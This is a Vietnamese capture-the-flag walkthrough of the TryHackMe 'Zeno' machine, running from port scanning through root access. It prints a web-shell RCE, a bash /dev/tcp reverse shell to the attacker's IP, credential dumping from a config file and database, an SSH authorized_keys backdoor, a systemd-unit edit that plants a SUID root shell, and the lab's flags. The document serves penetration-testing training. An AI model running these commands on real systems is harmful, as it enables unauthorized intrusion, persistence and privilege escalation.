Zeno
Do you have the same patience as the great stoic philosopher Zeno? Try it out!
November 4, 2025
•
August 21, 2025
•
Medium
Author
Hung Nguyen Tuong
Hung Nguyen TuongInitial Reconnaissance
Service Scanning
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sC -v zeno.thm
Not shown: 973 filtered tcp ports (no-response), 26 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
| 256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_ 256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519)Kết quả quét bằng Nmap cho thấy có 26 cổng trong số 1000 cổng phổ biến nhất bị lọc, điều này gợi ý rằng có thể có firewall hoặc chúng ta chưa quét hết các cổng.
Để chắc chắn hơn, chúng ta thử quét lại với một công cụ nhanh hơn là RustScan.
┌──(kali㉿kali)-[~]
└─$ rustscan -a zeno.thm
Open 10.201.83.24:22
Open 10.201.83.24:12340
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 22,12340 -sV -sC -v zeno.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
| 256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_ 256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519)
12340/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: We've got some trouble | 404 - Resource not found
| http-methods:
| Supported Methods: POST OPTIONS GET HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16Kết quả cho thấy ngoài dịch vụ SSH, còn có một dịch vụ HTTP chạy trên một cổng không phổ biến với Apache phiên bản 2.4.6.
HTTP 12340
Subdomain Enumeration
Trước hết, chúng ta thử enumerate subdomain bằng ffuf, nhưng không thu được kết quả gì.
ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.201.83.24:12340/ -H "Host: FUZZ.zeno.thm" -mc 200 -fw 120
Directory Enumeration
Tiếp theo, ta scan nội dung ẩn trên website.
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://zeno.thm:12340/FUZZ -r -fc 403 -e .php,.txt
Kết quả phát hiện một thư mục /rms.
/rms
Nhiều khả năng rms ở đây viết tắt cho Restaurant Management System.
/rms Directory Enumeration
Chúng ta tiếp tục scan nội dung trong thư mục /rms.
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://zeno.thm:12340/rms/FUZZ -r -fc 403 -e .php,.txt
Chúng ta phát hiện nhiều file .php, nhưng hầu hết đều redirect sang access-denied.php do chưa được xác thực.
/rms/access-denied.php
/rms/aboutus.php
/rms/admin
Truy cập /rms/admin/login-form.php, đây là trang login của admin.
Trang login này không có cơ chế rate limiting. Chúng ta có thể thử một số default credentials nhưng không thành công:
admin:adminadmin:passwordadmin:ADMIN
Remote Code Execution
Dùng searchsploit, ta thấy rằng hệ thống này tồn tại một lỗ hổng RCE.
Exploit sẽ upload một web shell lên server dưới tên reverse-shell.php.
Thông qua web shell, chúng ta có thể thực thi lệnh dưới quyền user apache.
Shell as apache
Sau đó, chúng ta dùng payload để tạo reverse shell connection:
/bin/bash -i >& /dev/tcp/10.17.21.52/4242 0>&1
->
http://zeno.thm:12340/rms/images/reverse-shell.php?cmd=%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.17.21.52%2F4242%200%3E%261
Khi vào bên trong hệ thống, chúng ta tìm user.txt nhưng không có quyền đọc vì file này chỉ dành cho user edward.
bash-4.2$ cd /home
cd /home
bash-4.2$ ls -la
ls -la
total 0
drwxr-xr-x. 3 root root 20 Jul 26 2021 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
drwxr-xr-x. 3 root root 127 Sep 21 2021 edward
bash-4.2$ cd edward
cd edward
bash-4.2$ ls -la
ls -la
total 20
drwxr-xr-x. 3 root root 127 Sep 21 2021 .
drwxr-xr-x. 3 root root 20 Jul 26 2021 ..
lrwxrwxrwx. 1 root root 9 Jul 26 2021 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 Apr 1 2020 .bash_logout
-rw-r--r--. 1 root root 193 Apr 1 2020 .bash_profile
-rw-r--r--. 1 root root 231 Apr 1 2020 .bashrc
drwxr-xr-x. 2 root root 29 Sep 21 2021 .ssh
-rw-------. 1 root root 699 Jul 26 2021 .viminfo
-rw-r-----. 1 root edward 38 Jul 26 2021 user.txt
bash-4.2$ cat user.txt
cat user.txt
cat: user.txt: Permission deniedSudo Permissions
bash-4.2$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for apache:Chúng ta kiểm tra sudo permission, nhưng khi chạy thì yêu cầu password, nên cũng không có thông tin gì.
Secret Share Discovery
bash-4.2$ cd /
cd /
bash-4.2$ ls -la
ls -la
total 16
dr-xr-xr-x. 17 root root 224 Jun 8 2021 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
lrwxrwxrwx. 1 root root 7 Jun 8 2021 bin -> usr/bin
dr-xr-xr-x. 5 root root 4096 Sep 23 2021 boot
drwxr-xr-x. 17 root root 2960 Aug 21 06:25 dev
drwxr-xr-x. 78 root root 8192 Aug 21 06:25 etc
drwxr-xr-x. 3 root root 20 Jul 26 2021 home
lrwxrwxrwx. 1 root root 7 Jun 8 2021 lib -> usr/lib
lrwxrwxrwx. 1 root root 9 Jun 8 2021 lib64 -> usr/lib64
drwxr-xr-x. 2 root root 6 Apr 11 2018 media
drwxr-xr-x. 3 root root 26 Sep 21 2021 mnt
drwxr-xr-x. 2 root root 6 Apr 11 2018 opt
dr-xr-xr-x. 142 root root 0 Aug 21 06:25 proc
dr-xr-x---. 3 root root 274 Sep 21 2021 root
drwxr-xr-x. 26 root root 760 Aug 21 06:25 run
lrwxrwxrwx. 1 root root 8 Jun 8 2021 sbin -> usr/sbin
drwxr-xr-x. 2 root root 6 Jul 26 2021 srv
dr-xr-xr-x. 13 root root 0 Aug 21 06:25 sys
drwxrwxrwt. 2 root root 15 Aug 21 08:57 tmp
drwxr-xr-x. 13 root root 155 Jun 8 2021 usr
drwxr-xr-x. 20 root root 278 Jul 26 2021 var
bash-4.2$ ls -la /tmp
ls -la /tmp
total 0
drwxrwxrwt. 2 root root 15 Aug 21 08:57 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
prw-r--r--. 1 apache apache 0 Aug 21 08:57 f
bash-4.2$ ls -la opt
ls -la opt
total 0
drwxr-xr-x. 2 root root 6 Apr 11 2018 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
bash-4.2$ ls -la mnt
ls -la mnt
total 0
drwxr-xr-x. 3 root root 26 Sep 21 2021 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
drwxr-xr-x. 2 edward edward 6 Sep 21 2021 secret-share
bash-4.2$ cd mnt
cd mnt
bash-4.2$ cd secret-share
cd secret-share
bash-4.2$ ls -la
ls -la
total 0
drwxr-xr-x. 2 edward edward 6 Sep 21 2021 .
drwxr-xr-x. 3 root root 26 Sep 21 2021 ..Tiếp tục enumerate, chúng ta phát hiện một thư mục secret_share nằm trong /mnt, nhưng không chứa gì.
Database Credentials Discovery
bash-4.2$ cd /var/www/html
cd /var/www/html
bash-4.2$ ls -la
ls -la
total 8
drwxr-xr-x. 3 root root 35 Jul 26 2021 .
drwxr-xr-x. 3 root root 18 Jul 26 2021 ..
-rw-r--r--. 1 root root 3897 Jul 26 2021 index.html
drwxr-xr-x. 10 root root 4096 Jul 26 2021 rms
bash-4.2$ cd rms
cd rms
bash-4.2$ ls -la
ls -la
total 208
drwxr-xr-x. 10 root root 4096 Jul 26 2021 .
drwxr-xr-x. 3 root root 35 Jul 26 2021 ..
-rw-r--r--. 1 root root 1888 Dec 8 2020 aboutus.php
-rw-r--r--. 1 root root 1312 Aug 9 2017 access-denied.php
drwxr-xr-x. 7 root root 4096 Jul 26 2021 admin
-rw-r--r--. 1 root root 289 Nov 17 2017 auth.php
-rw-r--r--. 1 root root 2960 Aug 9 2017 billing-alternative.php
-rw-r--r--. 1 root root 1395 Jul 26 2021 billing-exec.php
-rw-r--r--. 1 root root 1267 Dec 8 2020 billing-success.php
-rw-r--r--. 1 root root 1373 Nov 17 2017 booked.php
-rw-r--r--. 1 root root 2697 Dec 8 2020 cart-exec.php
-rw-r--r--. 1 root root 8899 Dec 8 2020 cart.php
drwxr-xr-x. 2 root root 24 Jul 26 2021 connection
-rw-r--r--. 1 root root 1664 Nov 17 2017 contactus.php
drwxr-xr-x. 2 root root 230 Dec 8 2020 css
-rw-r--r--. 1 root root 748 Dec 8 2020 delete-order.php
drwxr-xr-x. 2 root root 209 Dec 8 2020 fonts
-rw-r--r--. 1 root root 6490 Dec 8 2020 foodzone.php
-rw-r--r--. 1 root root 450 Aug 9 2017 footer.php
-rw-r--r--. 1 root root 1016 Aug 9 2017 gallery.php
drwxr-xr-x. 2 apache apache 4096 Aug 21 08:55 images
-rw-r--r--. 1 root root 3195 Jul 26 2021 inbox.php
-rw-r--r--. 1 root root 6993 Jul 26 2021 index.php
-rw-r--r--. 1 root root 1531 Dec 8 2020 login-exec.php
-rw-r--r--. 1 root root 1310 Dec 8 2020 login-failed.php
-rw-r--r--. 1 root root 6587 Dec 8 2020 login-register.php
-rw-r--r--. 1 root root 1759 Aug 1 2017 logout.php
-rw-r--r--. 1 root root 5108 Dec 8 2020 member-index.php
-rw-r--r--. 1 root root 5297 Dec 8 2020 member-profile.php
-rw-r--r--. 1 root root 3017 Dec 8 2020 order-exec.php
-rw-r--r--. 1 root root 3945 Dec 8 2020 partyhalls.php
-rw-r--r--. 1 root root 5898 Dec 8 2020 password-reset.php
-rw-r--r--. 1 root root 1845 Dec 8 2020 ratings-exec.php
-rw-r--r--. 1 root root 1340 Dec 8 2020 ratings-failed.php
-rw-r--r--. 1 root root 1261 Dec 8 2020 ratings-success.php
-rw-r--r--. 1 root root 4490 Dec 8 2020 ratings.php
-rw-r--r--. 1 root root 1881 Dec 8 2020 register-exec.php
-rw-r--r--. 1 root root 1523 Dec 8 2020 register-failed.php
-rw-r--r--. 1 root root 1213 Dec 8 2020 register-success.php
-rw-r--r--. 1 root root 3070 Dec 8 2020 reserve-exec.php
-rw-r--r--. 1 root root 1322 Dec 8 2020 reserve-success.php
-rw-r--r--. 1 root root 1361 Dec 8 2020 reset-failed.php
-rw-r--r--. 1 root root 1229 Dec 8 2020 reset-success.php
-rw-r--r--. 1 root root 3411 Dec 8 2020 specialdeals.php
drwxr-xr-x. 2 root root 29 Dec 8 2020 stylesheets
drwxr-xr-x. 2 root root 65 Dec 8 2020 swf
-rw-r--r--. 1 root root 3846 Dec 8 2020 tables.php
-rw-r--r--. 1 root root 1573 Dec 8 2020 update-exec.php
-rw-r--r--. 1 root root 3466 Dec 8 2020 update-quantity.php
drwxr-xr-x. 2 root root 21 Dec 8 2020 validationTrong /var/www/html/connection chứa file config.php, bên trong có database credentials của root user.
bash-4.2$ cd connection
cd connection
bash-4.2$ ls -la
ls -la
total 8
drwxr-xr-x. 2 root root 24 Jul 26 2021 .
drwxr-xr-x. 10 root root 4096 Jul 26 2021 ..
-rw-r--r--. 1 root root 239 Jul 26 2021 config.php
bash-4.2$ cat config.php
cat config.php
<?php
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PASSWORD', 'veerUffIrangUfcubyig');
define('DB_DATABASE', 'dbrms');
define('APP_NAME', 'Pathfinder Hotel');
error_reporting(1);
?>Chúng ta tiếp tục enumerate database với credentials này.
bash-4.2$ mysql
mysql
ERROR 1045 (28000): Access denied for user 'apache'@'localhost' (using password: NO)
bash-4.2$ mmysql -u root -p
mysql -u root -p
Enter password: veerUffIrangUfcubyig
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 29738
Server version: 5.5.68-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dbrms |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
MariaDB [(none)]> use dbrms;
use dbrms;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [dbrms]> show tables;
show tables;
+----------------------+
| Tables_in_dbrms |
+----------------------+
| billing_details |
| cart_details |
| categories |
| currencies |
| food_details |
| members |
| messages |
| orders_details |
| partyhalls |
| pizza_admin |
| polls_details |
| quantities |
| questions |
| ratings |
| reservations_details |
| specials |
| staff |
| tables |
| timezones |
| users |
+----------------------+
20 rows in set (0.00 sec)
MariaDB [dbrms]> select * from users;
select * from users;
Empty set (0.00 sec)
MariaDB [dbrms]> select * from members;
select * from members;
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
| member_id | firstname | lastname | login | passwd | question_id | answer |
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
| 15 | Stephen | Omolewa | omolewastephen@gmail.com | 81dc9bdb52d04dc20036dbd8313ed055 | 9 | 51977f38bb3afdf634dd8162c7a33691 |
| 16 | John | Smith | jsmith@sample.com | 1254737c076cf867dc53d60a0364f38e | 8 | 9f2780ee8346cc83b212ff038fcdb45a |
| 17 | edward | zeno | edward@zeno.com | 6f72ea079fd65aff33a67a3f3618b89c | 8 | 6f72ea079fd65aff33a67a3f3618b89c |
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
3 rows in set (0.00 sec)Chúng ta tìm thấy 3 password hash cùng với các security question hash. Ta sẽ thử crack chúng với online hash cracker:
┌──(kali㉿kali)-[~/Desktop]
└─$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=16
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2025-08-21 14:23) 0g/s 27583Kp/s 27583Kc/s 27583KC/s fuckyooh21..*7¡Vamos!
Session completed.
┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 6f72ea079fd65aff33a67a3f3618b89c
Time.Started.....: Thu Aug 21 14:24:35 2025 (1 sec)
Time.Estimated...: Thu Aug 21 14:24:36 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 23774.1 kH/s (1.56ms) @ Accel:2048 Loops:1 Thr:32 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[30313032333932333936] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 46c Util: 25% Core:2010MHz Mem:8000MHz Bus:8bash-4.2$ su edward
su edward
Password: zeno
su: Authentication failure
bash-4.2$ su edward
su edward
Password: edward
su: Authentication failure
bash-4.2$ su edward
su edward
Password:
su: Authentication failureDù vậy, ta vẫn chưa thể crack được mật khẩu của user mục tiêu của ta, là edward.
LinPEAS
Để mở rộng phạm vi tìm kiếm, chúng ta transfer LinPEAS lên target và chạy để enumerate các vector leo quyền khả thi.
Tại local có chạy một dịch vụ SMTP tại port 25 và một dịch vụ nào đó trên port 9000.
Kết quả còn cho thấy chúng ta có quyền ghi vào file service /etc/systemd/system/zeno-monitoring.service.
[edward@zeno ~]$ cd /etc/systemd/system
[edward@zeno system]$ ls -la
total 12
drwxr-xr-x. 12 root root 4096 Sep 21 2021 .
drwxr-xr-x. 4 root root 151 Jul 26 2021 ..
drwxr-xr-x. 2 root root 57 Jun 8 2021 basic.target.wants
lrwxrwxrwx. 1 root root 41 Jun 8 2021 dbus-org.fedoraproject.FirewallD1.service -> /usr/lib/systemd/system/firewalld.service
lrwxrwxrwx. 1 root root 46 Jun 8 2021 dbus-org.freedesktop.NetworkManager.service -> /usr/lib/systemd/system/NetworkManager.service
lrwxrwxrwx. 1 root root 57 Jun 8 2021 dbus-org.freedesktop.nm-dispatcher.service -> /usr/lib/systemd/system/NetworkManager-dispatcher.service
lrwxrwxrwx. 1 root root 37 Jun 8 2021 default.target -> /lib/systemd/system/multi-user.target
drwxr-xr-x. 2 root root 87 Jun 8 2021 default.target.wants
drwxr-xr-x. 2 root root 38 Jun 8 2021 dev-virtio\x2dports-org.qemu.guest_agent.0.device.wants
drwxr-xr-x. 2 root root 32 Jun 8 2021 getty.target.wants
drwxr-xr-x. 2 root root 35 Jun 8 2021 local-fs.target.wants
drwxr-xr-x. 2 root root 4096 Sep 21 2021 multi-user.target.wants
drwxr-xr-x. 2 root root 48 Jun 8 2021 network-online.target.wants
drwxr-xr-x. 2 root root 29 Jun 8 2021 sockets.target.wants
drwxr-xr-x. 2 root root 217 Jun 8 2021 sysinit.target.wants
drwxr-xr-x. 2 root root 44 Jun 8 2021 system-update.target.wants
-rw-rw-rw-. 1 root root 184 Aug 21 09:39 zeno-monitoring.service
[edward@zeno system]$ cat zeno-monitoring.service
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/root/zeno-monitoring.py
[Install]
WantedBy=multi-user.targetService này sẽ thực thi script Python /root/zeno-monitoring.py dưới quyền root mỗi khi nó được restart hoặc hệ thống reboot. Vì vậy, nếu chúng ta chỉnh sửa giá trị ExecStart, ta có thể chạy lệnh tùy ý với quyền root.
Ngoài ra, khi chạy LinPEAS, chúng ta còn phát hiện thêm một bộ credentials khác.
/etc/fstab:#//10.10.10.10/secret-share /mnt/secret-share cifs _netdev,vers=3.0,ro,username=zeno,password=FrobjoodAdkoonceanJa,domain=localdomain,soft 0 0Vì zeno chính là họ của edward mà ta đã biết từ trước trong database, nên nhiều khả năng đây chính là mật khẩu của anh ta.
Shell as edward
bash-4.2$ su edward
su edward
Password: FrobjoodAdkoonceanJa
[edward@zeno tmp]$ id
id
uid=1000(edward) gid=1000(edward) groups=1000(edward) context=system_u:system_r:httpd_t:s0user.txt
[edward@zeno tmp]$ cd ~
cd ~
[edward@zeno ~]$ ls -la
ls -la
total 20
drwxr-xr-x. 3 root root 127 Sep 21 2021 .
drwxr-xr-x. 3 root root 20 Jul 26 2021 ..
lrwxrwxrwx. 1 root root 9 Jul 26 2021 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 Apr 1 2020 .bash_logout
-rw-r--r--. 1 root root 193 Apr 1 2020 .bash_profile
-rw-r--r--. 1 root root 231 Apr 1 2020 .bashrc
drwxr-xr-x. 2 root root 29 Sep 21 2021 .ssh
-rw-------. 1 root root 699 Jul 26 2021 .viminfo
-rw-r-----. 1 root edward 38 Jul 26 2021 user.txt
[edward@zeno ~]$ cat user.txt
cat user.txt
THM{070cab2c9dc622e5d25c0709f6cb0510}Sudo Permissions
[edward@zeno ~]$ sudo -l
sudo -l
Matching Defaults entries for edward on zeno:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User edward may run the following commands on zeno:
(ALL) NOPASSWD: /usr/sbin/rebootĐây chính là hướng đi hợp lý, vì user edward có quyền dùng sudo để chạy binary reboot để khởi động lại máy và khởi chạy service kia.
SSH Backdoor
Do chúng ta không có quyền chạy systemctl restart để restart trực tiếp service zeno-monitoring.service, cách duy nhất là khởi động lại máy với quyền root. Để tiện lợi hơn sau khi reboot, chúng ta đặt một SSH backdoor cho user edward thay vì phải đăng nhập vòng qua user apache rồi mới tới edward.
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/kali/.ssh/id_ed25519): key_edward
Enter passphrase for "key_edward" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in key_edward
Your public key has been saved in key_edward.pub
The key fingerprint is:
SHA256:IAUhPdM4vDOZmuWr6iX+l1GlgtCPczfYDlQhgq2sIlw kali@kali
The key's randomart image is:
+--[ED25519 256]--+
| =+o*oo. |
| o +Ooo . |
|. o *B+ o |
| o EBB B |
|o .=oo* S |
|+.o .. . |
|o. . .o |
|. o .o |
|o+oo. |
+----[SHA256]-----+
┌──(kali㉿kali)-[~/Desktop]
└─$ chmod 400 key_edward
┌──(kali㉿kali)-[~/Desktop]
└─$ cat key_edward.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4qNBLG1/sXhApn96+W5lxxcauro3Jd6M0FgGFfFnEd kali@kali[edward@zeno ~]$ cd .ssh
cd .ssh
[edward@zeno .ssh]$ ls -la
ls -la
total 4
drwxr-xr-x. 2 root root 29 Sep 21 2021 .
drwxr-xr-x. 3 root root 127 Sep 21 2021 ..
-rw-------. 1 edward edward 1 Sep 21 2021 authorized_keys
[edward@zeno .ssh]$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4qNBLG1/sXhApn96+W5lxxcauro3Jd6M0FgGFfFnEd kali@kali" >> authorized_keys
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4qNBLG1/sXhApn96+W5lxxcauro3Jd6M0FgGFfFnEd kali@kali" >> authorized_keys┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i key_edward edward@zeno.thm
Last login: Thu Aug 21 10:01:16 2025
[edward@zeno ~]$ id
uid=1000(edward) gid=1000(edward) groups=1000(edward) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023Sau đó, chúng ta chỉnh sửa file /etc/systemd/system/zeno-monitoring.service để khi service khởi chạy, nó sẽ tạo một bản copy của /bin/bash và gán SUID permission bit.
[edward@zeno system]$ cat << EOF > /etc/systemd/system/zeno-monitoring.service
> [Unit]
> Description=Zeno monitoring
>
> [Service]
> Type=simple
> User=root
> ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/rootbash && chmod +s /home/edward/rootbash'
>
> [Install]
> WantedBy=multi-user.target
> EOF
[edward@zeno system]$ cat zeno-monitoring.service
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/rootbash && chmod +s /home/edward/rootbash'
[Install]
WantedBy=multi-user.target
[edward@zeno system]$ sudo /usr/sbin/reboot
Connection to zeno.thm closed by remote host.
Connection to zeno.thm closed.Shell as root
Tiến hành reboot máy, đợi vài phút cho hệ thống khởi động xong, rồi chạy bản binary bash mà ta đã chỉnh sửa.
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i key_edward edward@zeno.thm
Last login: Thu Aug 21 10:14:31 2025 from ip-10-17-21-52.ec2.internal
[edward@zeno ~]$ ls -la
total 964
drwxr-xr-x. 3 root root 143 Aug 21 10:19 .
drwxr-xr-x. 3 root root 20 Jul 26 2021 ..
lrwxrwxrwx. 1 root root 9 Jul 26 2021 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 Apr 1 2020 .bash_logout
-rw-r--r--. 1 root root 193 Apr 1 2020 .bash_profile
-rw-r--r--. 1 root root 231 Apr 1 2020 .bashrc
-rwsr-sr-x. 1 root root 964536 Aug 21 10:19 rootbash
drwxr-xr-x. 2 root root 29 Sep 21 2021 .ssh
-rw-r-----. 1 root edward 38 Jul 26 2021 user.txt
-rw-------. 1 root root 699 Jul 26 2021 .viminfo
[edward@zeno ~]$ ./rootbash -p
rootbash-4.2# id
uid=1000(edward) gid=1000(edward) euid=0(root) egid=0(root) groups=0(root),1000(edward) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023Kết quả, chúng ta đã leo quyền thành công và có được quyền root trên hệ thống.
root.txt
rootbash-4.2# cd /root
rootbash-4.2# ls -la
total 60
dr-xr-x---. 3 root root 274 Sep 21 2021 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
-rw-------. 1 root root 1537 Jun 8 2021 anaconda-ks.cfg
-rw-------. 1 root root 10666 Sep 23 2021 .bash_history
lrwxrwxrwx. 1 root root 9 Jul 26 2021 bash_history -> /dev/null
-rw-r--r--. 1 root root 18 Dec 29 2013 .bash_logout
-rw-r--r--. 1 root root 176 Dec 29 2013 .bash_profile
-rw-r--r--. 1 root root 176 Dec 29 2013 .bashrc
-rw-r--r--. 1 root root 100 Dec 29 2013 .cshrc
-rw-------. 1 root root 1026 Sep 21 2021 .mysql_history
drwxr-----. 3 root root 19 Jul 26 2021 .pki
-rw-r--r--. 1 root root 38 Jul 26 2021 root.txt
-rw-r--r--. 1 root root 129 Dec 29 2013 .tcshrc
-rw-------. 1 root root 6363 Sep 21 2021 .viminfo
-rw-r--r--. 1 root root 1 Sep 21 2021 zeno-monitoring.log
-rwxr-xr-x. 1 root root 358 Sep 21 2021 zeno-monitoring.py
rootbash-4.2# cat root.txt
THM{b187ce4b85232599ca72708ebde71791}